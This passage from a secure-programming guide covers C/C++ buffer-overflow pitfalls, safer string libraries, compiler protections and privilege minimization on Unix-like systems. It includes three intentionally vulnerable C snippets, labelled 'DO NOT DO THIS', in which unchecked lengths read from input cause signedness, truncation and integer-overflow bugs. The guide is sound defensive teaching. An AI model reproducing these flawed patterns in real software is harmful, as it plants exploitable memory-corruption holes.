(). Finally, it appears that at least some versions of snprintf don't
guarantee that its string will end in NIL; if the string is too long, it
won't include NIL at all. Note that the glib library (the basis of GTK, and
not the same as the GNU C library glibc) has a g_snprintf(), which has a
consistent return semantic, always NIL-terminates, and most importantly
always respects the buffer length.

Of course, the problem is more than just calling string functions poorly.
Here are a few additional examples of types of buffer overflow problems,
graciously suggested by Timo Sirainen, involving manipulation of numbers to
cause buffer overflows.

First, there's the problem of signedness. If you read data that affects the
buffer size, such as the "number of characters to be read," be sure to check
if the number is less than zero or one. Otherwise, the negative number may be
cast to an unsigned number, and the resulting large positive number may then
permit a buffer overflow problem. Note that sometimes an attacker can provide
a large positive number and have the same thing happen; in some cases, the
large value will be interpreted as a negative number (slipping by the check
for large numbers if there's no check for a less-than-one value), and then be
interpreted later into a large positive value.
 /* 1) signedness - DO NOT DO THIS. */
 char *buf;
 int i, len;

 read(fd, &len, sizeof(len));

 /* OOPS!  We forgot to check for < 0 */
 if (len > 8000) { error("too large length"); return; }

 buf = malloc(len);
 read(fd, buf, len); /* len casted to unsigned and overflows */

Here's a second example identified by Timo Sirainen, involving integer size
truncation. Sometimes the different sizes of integers can be exploited to
cause a buffer overflow. Basically, make sure that you don't truncate any
integer results used to compute buffer sizes. Here's Timo's example for
64-bit architectures:
 /* An example of an ERROR for some 64-bit architectures,
    if "unsigned int" is 32 bits and "size_t" is 64 bits: */

 void *mymalloc(unsigned int size) { return malloc(size); }

 char *buf;
 size_t len;

 read(fd, &len, sizeof(len));

 /* we forgot to check the maximum length */

 /* 64-bit size_t gets truncated to 32-bit unsigned int */
 buf = mymalloc(len);
 read(fd, buf, len);

Here's a third example from Timo Sirainen, involving integer overflow. This
is particularly nasty when combined with malloc(); an attacker may be able to
create a situation where the computed buffer size is less than the data to be
placed in it. Here is Timo's sample:
 /* 3) integer overflow */
 char *buf;
 size_t len;

 read(fd, &len, sizeof(len));

 /* we forgot to check the maximum length */

 buf = malloc(len+1); /* +1 can overflow to malloc(0) */
 read(fd, buf, len);
 buf[len] = '\0';
-----------------------------------------------------------------------------

6.2. Library Solutions in C/C++

One partial solution in C/C++ is to use library functions that do not have
buffer overflow problems. The first subsection describes the ``standard C
library'' solution, which can work but has its disadvantages. The next
subsection describes the general security issues of both fixed length and
dynamically reallocated approaches to buffers. The following subsections
describe various alternative libraries, such as strlcpy and libmib. Note that
these don't solve all problems; you still have to code extremely carefully in
C/C++ to avoid all buffer overflow situations.
-----------------------------------------------------------------------------

6.2.1. Standard C Library Solution

The ``standard'' solution to prevent buffer overflow in C (which is also used
in some C++ programs) is to use the standard C library calls that defend
against these problems. This approach depends heavily on the standard library
functions strncpy(3) and strncat(3). If you choose this approach, beware:
these calls have somewhat surprising semantics and are hard to use correctly.
The function strncpy(3) does not NIL-terminate the destination string if the
source string length is at least equal to the destination's, so be sure to
set the last character of the destination string to NIL after calling strncpy
(3). If you're going to reuse the same buffer many times, an efficient
approach is to tell strncpy() that the buffer is one character shorter than
it actually is and set the last character to NIL once before use. Both
strncpy(3) and strncat(3) require that you pass the amount of space left
available, a computation that is easy to get wrong (and getting it wrong
could permit a buffer overflow attack). Neither provide a simple mechanism to
determine if an overflow has occurred. Finally, strncpy(3) has a significant
performance penalty compared to the strcpy(3) it supposedly replaces, because
strncpy(3) NIL-fills the remainder of the destination. I've gotten emails
expressing surprise over this last point, but this is clearly stated in
Kernighan and Ritchie second edition [Kernighan 1988, page 249], and this
behavior is clearly documented in the man pages for Linux, FreeBSD, and
Solaris. This means that just changing from strcpy to strncpy can cause a
severe reduction in performance, for no good reason in most cases.

Warning!! The function strncpy(s1, s2, n) can also be used as a way of
copying only part of s2, where n is less than strlen(s2). When used this way,
strncpy() basically provides no protection against buffer overflow by itself
- you have to take separate actions to ensure that n is smaller than the
buffer of s1. Also, when used this way, strncpy() does not usually add a
trailing NIL after copying n characters. This makes it harder to determine if
a program using strncpy() is secure.

You can also use sprintf() while preventing buffer overflows, but you need to
be careful when doing so; it's so easy to misapply that it's hard to
recommend. The sprintf control string can contain various conversion
specifiers (e.g., "%s"), and the control specifiers can have optional field
width (e.g., "%10s") and precision (e.g., "%.10s") specifications. These look
quite similar (the only difference is a period) but they are very different.
The field width only specifies a minimum length and is completely worthless
for preventing buffer overflows. In contrast, the precision specification
specifies the maximum length that that particular string may have in its
output when used as a string conversion specifier - and thus it can be used
to protect against buffer overflows. Note that the precision specification
only specifies the total maximum length when dealing with a string; it has a
different meaning for other conversion operations. If the size is given as a
precision of "*", then you can pass the maximum size as a parameter (e.g.,
the result of a sizeof() operation). This is most easily shown by an example
- here's the wrong and right way to use sprintf() to protect against buffer
overflows:
 char buf[BUFFER_SIZE];
 sprintf(buf, "%*s",  sizeof(buf)-1, "long-string");  /* WRONG */
 sprintf(buf, "%.*s", sizeof(buf)-1, "long-string");  /* RIGHT */
In theory, sprintf() should be very helpful because you can use it to specify
complex formats. Sadly, it's easy to get things wrong with sprintf(). If the
format is complex, you need to make sure that the destination is large enough
for the largest possible size of the entire format, but the precision field
only controls the size of one parameter. The "largest possible" value is
often hard to determine when a complicated output is being created. If a
program doesn't allocate quite enough space for the longest possible
combination, a buffer overflow vulnerability may open up. Also, sprintf()
appends a NUL to the destination after the entire operation is complete -
this extra character is easy to forget and creates an opportunity for
off-by-one errors. So, while this works, it can be painful to use in some
circumstances.

Also, a quick note about the code above - note that the sizeof() operation
used the size of an array. If the code were changed so that ``buf'' was a
pointer to some allocated memory, then all ``sizeof()'' operations would have
to be changed (or sizeof would just measure the size of a pointer, which
isn't enough space for most values).

The scanf() family is sadly a little murky as well. An obvious question is
whether or not the maximum width value can be used in %s to prevent these
attacks. There are multiple official specifications for scanf(); some clearly
state that the width parameter is the absolutely largest number of
characters, while others aren't as clear. The biggest problem is
implementations; modern implementations that I know of do support maximum
widths, but I cannot say with certainty that all libraries properly implement
maximum widths. The safest approach is to do things yourself in such cases.
However, few will fault you if you simply use scanf and include the widths in
the format strings (but don't forget to count \0, or you'll get the wrong
length). If you do use scanf, it's best to include a test in your
installation scripts to ensure that the library properly limits length.
-----------------------------------------------------------------------------

6.2.2. Static and Dynamically Allocated Buffers

Functions such as strncpy are useful for dealing with statically allocated
buffers. This is a programming approach where a buffer is allocated for the
``longest useful size'' and then it stays a fixed size from then on. The
alternative is to dynamically reallocate buffer sizes as you need them. It
turns out that both approaches have security implications.

There is a general security problem when using fixed-length buffers: the fact
that the buffer is a fixed length may be exploitable. This is a problem with
strncpy(3) and strncat(3), snprintf(3), strlcpy(3), strlcat(3), and other
such functions. The basic idea is that the attacker sets up a really long
string so that, when the string is truncated, the final result will be what
the attacker wanted (instead of what the developer intended). Perhaps the
string is catenated from several smaller pieces; the attacker might make the
first piece as long as the entire buffer, so all later attempts to
concatenate strings do nothing. Here are some specific examples:

<A0><A0>*<2A>Imagine code that calls gethostbyname(3) and, if successful, immediately
    copies hostent->h_name to a fixed-size buffer using strncpy or snprintf.
    Using strncpy or snprintf protects against an overflow of an excessively
    long fully-qualified domain name (FQDN), so you might think you're done.
    However, this could result in chopping off the end of the FQDN. This may
    be very undesirable, depending on what happens next.

<A0><A0>*<2A>Imagine code that uses strncpy, strncat, snprintf, etc., to copy the full
    path of a filesystem object to some buffer. Further imagine that the
    original value was provided by an untrusted user, and that the copying is
    part of a process to pass a resulting computation to a function. Sounds
    safe, right? Now imagine that an attacker pads a path with a large number
    of '/'s at the beginning. This could result in future operations being
    performed on the file ``/''. If the program appends values in the belief
    that the result will be safe, the program may be exploitable. Or, the
    attacker could devise a long filename near the buffer length, so that
    attempts to append to the filename would silently fail to occur (or only
    partially occur in ways that may be exploitable).


When using statically-allocated buffers, you really need to consider the
length of the source and destination arguments. Sanity checking the input and
the resulting intermediate computation might deal with this, too.

Another alternative is to dynamically reallocate all strings instead of using
fixed-size buffers. This general approach is recommended by the GNU
programming guidelines, since it permits programs to handle arbitrarily-sized
inputs (until they run out of memory). Of course, the major problem with
dynamically allocated strings is that you may run out of memory. The memory
may even be exhausted at some other point in the program than the portion
where you're worried about buffer overflows; any memory allocation can fail.
Also, since dynamic reallocation may cause memory to be inefficiently
allocated, it is entirely possible to run out of memory even though
technically there is enough virtual memory available to the program to
continue. In addition, before running out of memory the program will probably
use a great deal of virtual memory; this can easily result in ``thrashing'',
a situation in which the computer spends all its time just shuttling
information between the disk and memory (instead of doing useful work). This
can have the effect of a denial of service attack. Some rational limits on
input size can help here. In general, the program must be designed to fail
safely when memory is exhausted if you use dynamically allocated strings.
-----------------------------------------------------------------------------

6.2.3. strlcpy and strlcat

An alternative, being employed by OpenBSD, is the strlcpy(3) and strlcat(3)
functions by Miller and de Raadt [Miller 1999]. This is a minimalist,
statically-sized buffer approach that provides C string copying and
concatenation with a different (and less error-prone) interface. Source and
documentation of these functions are available under a newer BSD-style open
source license at [ftp://ftp.openbsd.org/pub/OpenBSD/src/lib/libc/string/
strlcpy.3] ftp://ftp.openbsd.org/pub/OpenBSD/src/lib/libc/string/strlcpy.3.

First, here are their prototypes:
+---------------------------------------------------------------------------+
|size_t strlcpy (char *dst, const char *src, size_t size);                  |
|size_t strlcat (char *dst, const char *src, size_t size);                  |
+---------------------------------------------------------------------------+
Both strlcpy and strlcat take the full size of the destination buffer as a
parameter (not the maximum number of characters to be copied) and guarantee
to NIL-terminate the result (as long as size is larger than 0). Remember that
you should include a byte for NIL in the size.

The strlcpy function copies up to size-1 characters from the NUL-terminated
string src to dst, NIL-terminating the result. The strlcat function appends
the NIL-terminated string src to the end of dst. It will append at most size
- strlen(dst) - 1 bytes, NIL-terminating the result.

One minor disadvantage of strlcpy(3) and strlcat(3) is that they are not, by
default, installed in most Unix-like systems. In OpenBSD, they are part of <
string.h>. This is not that difficult a problem; since they are small
functions, you can even include them in your own program's source (at least
as an option), and create a small separate package to load them. You can even
use autoconf to handle this case automatically. If more programs use these
functions, it won't be long before these are standard parts of Linux
distributions and other Unix-like systems. Also, these functions have been
recently added to the ``glib'' library (I submitted the patch to do this), so
using recent versions of glib makes them available. In glib these functions
are named g_strlcpy and g_strlcat (not strlcpy or strlcat) to be consistent
with the glib library naming conventions.

Also, strlcat(3) has slightly varying semantics when the provided size is 0
or if there are no NIL characters in the destination string dst (inside the
given number of characters). In OpenBSD, if the size is 0, then the
destination string's length is considered 0. Also, if size is nonzero, but
there are no NIL characters in the destination string (in the size number of
characters), then the length of the destination is considered equal to the
size. These rules make handling strings without embedded NILs consistent.
Unfortunately, at least Solaris doesn't (at this time) obey these rules,
because they weren't specified in the original documentation. I've talked to
Todd Miller, and he and I agree that the OpenBSD semantics are the correct
ones (and that Solaris is incorrect). The reasoning is simple: under no
condition should strlcat or strlcpy ever examine characters in the
destination outside of the range of size; such access might cause core dumps
(from accessing out-of-range memory) and even hardware interactions (through
memory-mapped I/O). Thus, given:
+---------------------------------------------------------------------------+
|  a = strlcat ("Y", "123", 0);                                             |
+---------------------------------------------------------------------------+
The correct answer is 3 (0+3=3), but Solaris will claim the answer is 4
because it incorrectly looks at characters beyond the "size" length in the
destination. For now, I suggest avoiding cases where the size is 0 or the
destination has no NIL characters. Future versions of glib will hide this
difference and always use the OpenBSD semantics.
-----------------------------------------------------------------------------

6.2.4. libmib

One toolset for C that dynamically reallocates strings automatically is the
``libmib allocated string functions'' by Forrest J. Cavalier III, available
at [http://www.mibsoftware.com/libmib/astring] http://www.mibsoftware.com/
libmib/astring. There are two variations of libmib; ``libmib-open'' appears
to be clearly open source under its own X11-like license that permits
modification and redistribution, but redistributions must choose a different
name, however, the developer states that it ``may not be fully tested.'' To
continuously get libmib-mature, you must pay for a subscription. The
documentation is not open source, but it is freely available.
-----------------------------------------------------------------------------

6.2.5. C++ std::string class

C++ developers can use the std::string class, which is built into the
language. This is a dynamic approach, as the storage grows as necessary.
However, it's important to note that if that class's data is turned into a
``char *'' (e.g., by using data() or c_str()), the possibilities of buffer
overflow resurface, so you need to be careful when when using such methods.
Note that c_str() always returns a NIL-terminated string, but data() may or
may not (it's implementation dependent, and most implementations do not
include the NIL terminator). Avoid using data(), and if you must use it,
don't be dependent on its format.

Many C++ developers use other string libraries as well, such as those that
come with other large libraries or even home-grown string libraries. With
those libraries, be especially careful - many alternative C++ string classes
include routines to automatically convert the class to a ``char *'' type. As
a result, they can silently introduce buffer overflow vulnerabilities.
-----------------------------------------------------------------------------

6.2.6. Libsafe

Arash Baratloo, Timothy Tsai, and Navjot Singh (of Lucent Technologies) have
developed Libsafe, a wrapper of several library functions known to be
vulnerable to stack smashing attacks. This wrapper (which they call a kind of
``middleware'') is a simple dynamically loaded library that contains modified
versions of C library functions such as strcpy(3). These modified versions
implement the original functionality, but in a manner that ensures that any
buffer overflows are contained within the current stack frame. Their initial
performance analysis suggests that this library's overhead is very small.
Libsafe papers and source code are available at [http://
www.research.avayalabs.com/project/libsafe] http://www.research.avayalabs.com
/project/libsafe. The Libsafe source code is available under the completely
open source LGPL license.

Libsafe's approach appears somewhat useful. Libsafe should certainly be
considered for inclusion by Linux distributors, and its approach is worth
considering by others as well. For example, I know that the Mandrake
distribution of Linux (version 7.1) includes it. However, as a software
developer, Libsafe is a useful mechanism to support defense-in-depth but it
does not really prevent buffer overflows. Here are several reasons why you
shouldn't depend just on Libsafe during code development:

<A0><A0>*<2A>Libsafe only protects a small set of known functions with obvious buffer
    overflow issues. At the time of this writing, this list is significantly
    shorter than the list of functions in this book known to have this
    problem. It also won't protect against code you write yourself (e.g., in
    a while loop) that causes buffer overflows.

<A0><A0>*<2A>Even if libsafe is installed in a distribution, the way it is installed
    impacts its use. The documentation recommends setting LD_PRELOAD to cause
    libsafe's protections to be enabled, but the problem is that users can
    unset this environment variable... causing the protection to be disabled
    for programs they execute!

<A0><A0>*<2A>Libsafe only protects against buffer overflows of the stack onto the
    return address; you can still overrun the heap or other variables in that
    procedure's frame.

<A0><A0>*<2A>Unless you can be assured that all deployed platforms will use libsafe
    (or something like it), you'll have to protect your program as though it
    wasn't there.

<A0><A0>*<2A>LibSafe seems to assume that saved frame pointers are at the beginning of
    each stack frame. This isn't always true. Compilers (such as gcc) can
    optimize away things, and in particular the option "-fomit-frame-pointer"
    removes the information that libsafe seems to need. Thus, libsafe may
    fail to work for some programs.


The libsafe developers themselves acknowledge that software developers
shouldn't just depend on libsafe. In their words:


    It is generally accepted that the best solution to buffer overflow
    attacks is to fix the defective programs. However, fixing defective
    programs requires knowing that a particular program is defective. The
    true benefit of using libsafe and other alternative security measures is
    protection against future attacks on programs that are not yet known to
    be vulnerable.

-----------------------------------------------------------------------------
6.2.7. Other Libraries

The glib (not glibc) library is a widely-available open source library that
provides a number of useful functions for C programmers. GTK+ and GNOME both
use glib, for example. As I noted earlier, in glib version 1.3.2, g_strlcpy()
and g_strlcat() have been added through a patch which I submitted. This
should make it easier to portably use those functions once these later
versions of glib become widely available. At this time I do not have an
analysis showing definitively that the glib library functions protect against
buffer overflows. However, many of the glib functions automatically allocate
memory, and those functions automatically fail with no reasonable way to
intercept the failure (e.g., to try something else instead). As a result, in
many cases most glib functions cannot be used in most secure programs. The
GNOME guidelines recommend using functions such as g_strdup_printf(), which
is fine as long as it's okay if your program immediately crashes if an
out-of-memory condition occurs. However, if you can't accept this, then using
such routines isn't appropriate.
-----------------------------------------------------------------------------

6.3. Compilation Solutions in C/C++

A completely different approach is to use compilation methods that perform
bounds-checking (see [Sitaker 1999] for a list). In my opinion, such tools
are very useful in having multiple layers of defense, but it's not wise to
use this technique as your sole defense. There are at least two reasons for
this. First of all, such tools generally only provide a partial defense
against buffer overflows (and the ``complete'' defenses are generally 12-30
times slower); C and C++ were simply not designed to protect against buffer
overflows. Second of all, for open source programs you cannot be certain what
tools will be used to compile the program; using the default ``normal''
compiler for a given system might suddenly open security flaws.

One of the more useful tools is ``StackGuard'', a modification of the
standard GNU C compiler gcc. StackGuard works by inserting a ``guard'' value
(called a ``canary'') in front of the return address; if a buffer overflow
overwrites the return address, the canary's value (hopefully) changes and the
system detects this before using it. This is quite valuable, but note that
this does not protect against buffer overflows overwriting other values
(which they may still be able to use to attack a system). There is work to
extend StackGuard to be able to add canaries to other data items, called
``PointGuard''. PointGuard will automatically protect certain values (e.g.,
function pointers and longjump buffers). However, protecting other variable
types using PointGuard requires specific programmer intervention (the
programmer has to identify which data values must be protected with
canaries). This can be valuable, but it's easy to accidentally omit
protection for a data value you didn't think needed protection - but needs it
anyway. More information on StackGuard, PointGuard, and other alternatives is
in Cowan [1999].

IBM has developed a stack protection system called ProPolice based on the
ideas of StackGuard. IBM doesn't include the ProPolice in its current website
- it's just called a "GCC extension for protecting applications from
stack-smashing attacks." Like StackGuard, ProPolice is a GCC (Gnu Compiler
Collection) extension for protecting applications from stack-smashing
attacks. Applications written in C are protected by automatically inserting
protection code into an application at compilation time. ProPolice is
slightly different than StackGuard, however, by adding three features: (1)
reordering local variables to place buffers after pointers (to avoid the
corruption of pointers that could be used to further corrupt arbitrary memory
locations), (2) copying pointers in function arguments to an area preceding
local variable buffers (to prevent the corruption of pointers that could be
used to further corrupt arbitrary memory locations), and (3) omitting
instrumentation code from some functions (it basically assumes that only
character arrays are dangerous; while this isn't strictly true, it's mostly
true, and as a result ProPolice has better performance while retaining most
of its protective capabilities). The IBM website includes information for how
to build Red Hat Linux and FreeBSD with this protection; OpenBSD has already
added ProPolice to their base system. I think this is extremely promising,
and I hope to see this capability included in future versions of gcc and used
in various distributions. In fact, I think this kind of capability should be
the default - this would mean that the largest single class of attacks would
no longer enable attackers to take control in most cases.

As a related issue, in Linux you could modify the Linux kernel so that the
stack segment is not executable; such a patch to Linux does exist (see Solar
Designer's patch, which includes this, at [http://www.openwall.com/linux/]
http://www.openwall.com/linux/ However, as of this writing this is not built
into the Linux kernel. Part of the rationale is that this is less protection
than it seems; attackers can simply force the system to call other
``interesting'' locations already in the program (e.g., in its library, the
heap, or static data segments). Also, sometimes Linux does require executable
code in the stack, e.g., to implement signals and to implement GCC
``trampolines''. Solar Designer's patch does handle these cases, but this
does complicate the patch. Personally, I'd like to see this merged into the
main Linux distribution, since it does make attacks somewhat more difficult
and it defends against a range of existing attacks. However, I agree with
Linus Torvalds and others that this does not add the amount of protection it
would appear to and can be circumvented with relative ease. You can read
Linus Torvalds' explanation for not including this support at [http://
old.lwn.net/1998/0806/a/linus-noexec.html] http://old.lwn.net/1998/0806/a/
linus-noexec.html.

In short, it's better to work first on developing a correct program that
defends itself against buffer overflows. Then, after you've done this, by all
means use techniques and tools like StackGuard as an additional safety net.
If you've worked hard to eliminate buffer overflows in the code itself, then
StackGuard (and tools like it) are are likely to be more effective because
there will be fewer ``chinks in the armor'' that StackGuard will be called on
to protect.
-----------------------------------------------------------------------------

6.4. Other Languages

The problem of buffer overflows is an excellent argument for using other
programming languages such as Perl, Python, Java, and Ada95. After all,
nearly all other programming languages used today (other than assembly
language) protect against buffer overflows. Using those other languages does
not eliminate all problems, of course; in particular see the discussion in
Section 8.3 regarding the NIL character. There is also the problem of
ensuring that those other languages' infrastructure (e.g., run-time library)
is available and secured. Still, you should certainly consider using other
programming languages when developing secure programs to protect against
buffer overflows.
-----------------------------------------------------------------------------

Chapter 7. Structure Program Internals and Approach

<A0>                                      Like a city whose walls are broken
                                       down is a man who lacks self-control.
<A0>                                                        Proverbs 25:28 (NIV)
-----------------------------------------------------------------------------

7.1. Follow Good Software Engineering Principles for Secure Programs

Saltzer [1974] and later Saltzer and Schroeder [1975] list the following
principles of the design of secure protection systems, which are still valid:

<A0><A0>*<2A>Least privilege. Each user and program should operate using the fewest
    privileges possible. This principle limits the damage from an accident,
    error, or attack. It also reduces the number of potential interactions
    among privileged programs, so unintentional, unwanted, or improper uses
    of privilege are less likely to occur. This idea can be extended to the
    internals of a program: only the smallest portion of the program which
    needs those privileges should have them. See Section 7.4 for more about
    how to do this.

<A0><A0>*<2A>Economy of mechanism/Simplicity. The protection system's design should be
    simple and small as possible. In their words, ``techniques such as
    line-by-line inspection of software and physical examination of hardware
    that implements protection mechanisms are necessary. For such techniques
    to be successful, a small and simple design is essential.'' This is
    sometimes described as the ``KISS'' principle (``keep it simple,
    stupid'').

<A0><A0>*<2A>Open design. The protection mechanism must not depend on attacker
    ignorance. Instead, the mechanism should be public, depending on the
    secrecy of relatively few (and easily changeable) items like passwords or
    private keys. An open design makes extensive public scrutiny possible,
    and it also makes it possible for users to convince themselves that the
    system about to be used is adequate. Frankly, it isn't realistic to try
    to maintain secrecy for a system that is widely distributed; decompilers
    and subverted hardware can quickly expose any ``secrets'' in an
    implementation. Bruce Schneier argues that smart engineers should
    ``demand open source code for anything related to security'', as well as
    ensuring that it receives widespread review and that any identified
    problems are fixed [Schneier 1999].

<A0><A0>*<2A>Complete mediation. Every access attempt must be checked; position the
    mechanism so it cannot be subverted. For example, in a client-server
    model, generally the server must do all access checking because users can
    build or modify their own clients. This is the point of all of Chapter 5,
    as well as Section 7.2.

<A0><A0>*<2A>Fail-safe defaults (e.g., permission-based approach). The default should
    be denial of service, and the protection scheme should then identify
    conditions under which access is permitted. See Section 7.7 and Section
    7.9 for more.

<A0><A0>*<2A>Separation of privilege. Ideally, access to objects should depend on more
    than one condition, so that defeating one protection system won't enable
    complete access.

<A0><A0>*<2A>Least common mechanism. Minimize the amount and use of shared mechanisms
    (e.g. use of the /tmp or /var/tmp directories). Shared objects provide
    potentially dangerous channels for information flow and unintended
    interactions. See Section 7.10 for more information.

<A0><A0>*<2A>Psychological acceptability / Easy to use. The human interface must be
    designed for ease of use so users will routinely and automatically use
    the protection mechanisms correctly. Mistakes will be reduced if the
    security mechanisms closely match the user's mental image of his or her
    protection goals.


A good overview of various design principles for security is available in
Peter Neumann's [http://www.csl.sri.com/users/neumann/chats.html#4]
Principled Assuredly Trustworthy Composable Architectures.
-----------------------------------------------------------------------------

7.2. Secure the Interface

Interfaces should be minimal (simple as possible), narrow (provide only the
functions needed), and non-bypassable. Trust should be minimized. Consider
limiting the data that the user can see.
-----------------------------------------------------------------------------

7.3. Separate Data and Control

Any files you support should be designed to completely separate (passive)
data from programs that are executed. Applications and data viewers may be
used to display files developed externally, so in general don't allow them to
accept programs (also known as ``scripts'' or ``macros''). The most dangerous
kind is an auto-executing macro that executes when the application is loaded
and/or when the data is initially displayed; from a security point-of-view
this is generally a disaster waiting to happen.

If you truly must support programs downloaded remotely (e.g., to implement an
existing standard), make sure that you have extremely strong control over
what the macro can do (this is often called a ``sandbox''). Past experience
has shown that real sandboxes are hard to implement correctly. In fact, I
can't remember a single widely-used sandbox that hasn't been repeatedly
exploited (yes, that includes Java). If possible, at least have the programs
stored in a separate file, so that it's easier to block them out when another
sandbox flaw has been found but not yet fixed. Storing them separately also
makes it easier to reuse code and to cache it when helpful.
-----------------------------------------------------------------------------

7.4. Minimize Privileges

As noted earlier, it is an important general principle that programs have the
minimal amount of privileges necessary to do its job (this is termed ``least
privilege''). That way, if the program is broken, its damage is limited. The
most extreme example is to simply not write a secure program at all - if this
can be done, it usually should be. For example, don't make your program
setuid or setgid if you can; just make it an ordinary program, and require
the administrator to log in as such before running it.

In Linux and Unix, the primary determiner of a process' privileges is the set
of id's associated with it: each process has a real, effective and saved id
for both the user and group (a few very old Unixes don't have a ``saved''
id). Linux also has, as a special extension, a separate filesystem UID and
GID for each process. Manipulating these values is critical to keeping
privileges minimized, and there are several ways to minimize them (discussed
below). You can also use chroot(2) to minimize the files visible to a
program, though using chroot() can be difficult to use correctly. There are a
few other values determining privilege in Linux and Unix, for example, POSIX
capabilities (supported by Linux 2.2 and greater, and by some other Unix-like
systems).
-----------------------------------------------------------------------------

7.4.1. Minimize the Privileges Granted

Perhaps the most effective technique is to simply minimize the highest
privilege granted. In particular, avoid granting a program root privilege if
possible. Don't make a program setuid root if it only needs access to a small
set of files; consider creating separate user or group accounts for different
function.

A common technique is to create a special group, change a file's group
ownership to that group, and then make the program setgid to that group. It's
better to make a program setgid instead of setuid where you can, since group
membership grants fewer rights (in particular, it does not grant the right to
change file permissions).

This is commonly done for game high scores. Games are usually setgid games,
the score files are owned by the group games, and the programs themselves and
their configuration files are owned by someone else (say root). Thus,
breaking into a game allows the perpetrator to change high scores but doesn't
grant the privilege to change the game's executable or configuration file.
The latter is important; if an attacker could change a game's executable or
its configuration files (which might control what the executable runs), then
they might be able to gain control of a user who ran the game.

If creating a new group isn't sufficient, consider creating a new pseudouser
(really, a special role) to manage a set of resources - often a new
pseudogroup (again, a special role) is also created just to run a program.
Web servers typically do this; often web servers are set up with a special
user (``nobody'') so that they can be isolated from other users. Indeed, web
servers are instructive here: web servers typically need root privileges to
start up (so they can attach to port 80), but once started they usually shed
all their privileges and run as the user ``nobody''. However, don't use the
``nobody'' account (unless you're writing a webserver); instead, create your
own pseudouser or new group. The purpose of this approach is to isolate
different programs, processes, and data from each other, by exploiting the
operating system's ability to keep users and groups separate. If different
programs shared the same account, then breaking into one program would also
grant privileges to the other. Usually the pseudouser should not own the
programs it runs; that way, an attack who breaks into the account cannot
change the program it runs. By isolating different parts of the system into
running separate users and groups, breaking one part will not necessarily
break the whole system's security.

If you're using a database system (say, by calling its query interface),
limit the rights of the database user that the application uses. For example,
don't give that user access to all of the system stored procedures if that
user only needs access to a handful of user-defined ones. Do everything you
can inside stored procedures. That way, even if someone does manage to force
arbitrary strings into the query, the damage that can be done is limited. If
you must directly pass a regular SQL query with client supplied data (and you
usually shouldn't), wrap it in something that limits its activities (e.g.,
sp_sqlexec). (My thanks to SPI Labs for these database system suggestions).

If you must give a program privileges usually reserved for root, consider
using POSIX capabilities as soon as your program can minimize the privileges
available to your program. POSIX capabilities are available in Linux 2.2 and
in many other Unix-like systems. By calling cap_set_proc(3) or the
Linux-specific capsetp(3) routines immediately after starting, you can
permanently reduce the abilities of your program to just those abilities it
actually needs. For example the network time daemon (ntpd) traditionally has
run as root, because it needs to modify the current time. However, patches
have been developed so ntpd only needs a single capability, CAP_SYS_TIME, so
even if an attacker gains control over ntpd it's somewhat more difficult to
exploit the program.

I say ``somewhat limited'' because, unless other steps are taken, retaining a
privilege using POSIX capabilities requires that the process continue to have
the root user id. Because many important files (configuration files,
binaries, and so on) are owned by root, an attacker controlling a program
with such limited capabilities can still modify key system files and gain
full root-level privilege. A Linux kernel extension (available in versions
2.4.X and 2.2.19+) provides a better way to limit the available privileges: a
program can start as root (with all POSIX capabilities), prune its
capabilities down to just what it needs, call prctl(PR_SET_KEEPCAPS,1), and
then use setuid() to change to a non-root process. The PR_SET_KEEPCAPS
setting marks a process so that when a process does a setuid to a nonzero
value, the capabilities aren't cleared (normally they are cleared). This
process setting is cleared on exec(). However, note that PR_SET_KEEPCAPS is a
Linux-unique extension for newer versions of the linux kernel.

One tool you can use to simplify minimizing granted privileges is the
``compartment'' tool developed by SuSE. This tool, which only works on Linux,
sets the filesystem root, uid, gid, and/or the capability set, then runs the
given program. This is particularly handy for running some other program
without modifying it. Here's the syntax of version 0.5:
+---------------------------------------------------------------------------+
|Syntax: compartment [options] /full/path/to/program                        |
|                                                                           |
|Options:                                                                   |
|  --chroot path   chroot to path                                           |
|  --user user     change UID to this user                                  |
|  --group group   change GID to this group                                 |
|  --init program  execute this program before doing anything               |
|  --cap capset    set capset name. You can specify several                 |
|  --verbose       be verbose                                               |
|  --quiet         do no logging (to syslog)                                |
+---------------------------------------------------------------------------+


Thus, you could start a more secure anonymous ftp server using:
+---------------------------------------------------------------------------+
|  compartment --chroot /home/ftp --cap CAP_NET_BIND_SERVICE anon-ftpd      |
+---------------------------------------------------------------------------+


At the time of this writing, the tool is immature and not available on
typical Linux distributions, but this may quickly change. You can download
the program via [http://www.suse.de/~marc] http://www.suse.de/~marc. A
similar tool is dreamland; you can that at [http://www.7ka.mipt.ru/~szh/
dreamland] http://www.7ka.mipt.ru/~szh/dreamland.

Note that not all Unix-like systems, implement POSIX capabilities, and
PR_SET_KEEPCAPS is currently a Linux-only extension. Thus, these approaches
limit portability. However, if you use it merely as an optional safeguard
only where it's available, using this approach will not really limit
portability. Also, while the Linux kernel version 2.2 and greater includes
the low-level calls, the C-level libraries to make their use easy are not
installed on some Linux distributions, slightly complicating their use in
applications. For more information on Linux's implementation of POSIX
capabilities, see [http://linux.kernel.org/pub/linux/libs/security/
linux-privs] http://linux.kernel.org/pub/linux/libs/security/linux-privs.

FreeBSD has the jail() function for limiting privileges; see the jail
documentation for more information. There are a number of specialized tools
and extensions for limiting privileges; see Section 3.10.
-----------------------------------------------------------------------------

7.4.2. Minimize the Time the Privilege Can Be Used

As soon as possible, permanently give up privileges. Some Unix-like systems,
including Linux, implement ``saved'' IDs which store the ``previous'' value.
The simplest approach is to reset any supplemental groups if appropriate
(e.g., using setgroups(2)), and then set the other id's twice to an untrusted
id. In setuid/setgid programs, you should usually set the effective gid and
uid to the real ones, in particular right after a fork(2), unless there's a
good reason not to. Note that you have to change the gid first when dropping
from root to another privilege or it won't work - once you drop root
privileges, you won't be able to change much else. Note that in some systems,
just setting the group isn't enough, if the process belongs to supplemental
groups with privileges. For example, the ``rsync'' program didn't remove the
supplementary groups when it changed its uid and gid, which created a
potential exploit.

It's worth noting that there's a well-known related bug that uses POSIX
capabilities to interfere with this minimization. This bug affects Linux
kernel 2.2.0 through 2.2.15, and possibly a number of other Unix-like systems
with POSIX capabilities. See Bugtraq id 1322 on http://www.securityfocus.com
for more information. Here is their summary:


    POSIX "Capabilities" have recently been implemented in the Linux kernel.
    These "Capabilities" are an additional form of privilege control to
    enable more specific control over what privileged processes can do.
    Capabilities are implemented as three (fairly large) bitfields, which
    each bit representing a specific action a privileged process can perform.
    By setting specific bits, the actions of privileged processes can be
    controlled -- access can be granted for various functions only to the
    specific parts of a program that require them. It is a security measure.
    The problem is that capabilities are copied with fork() execs, meaning
    that if capabilities are modified by a parent process, they can be
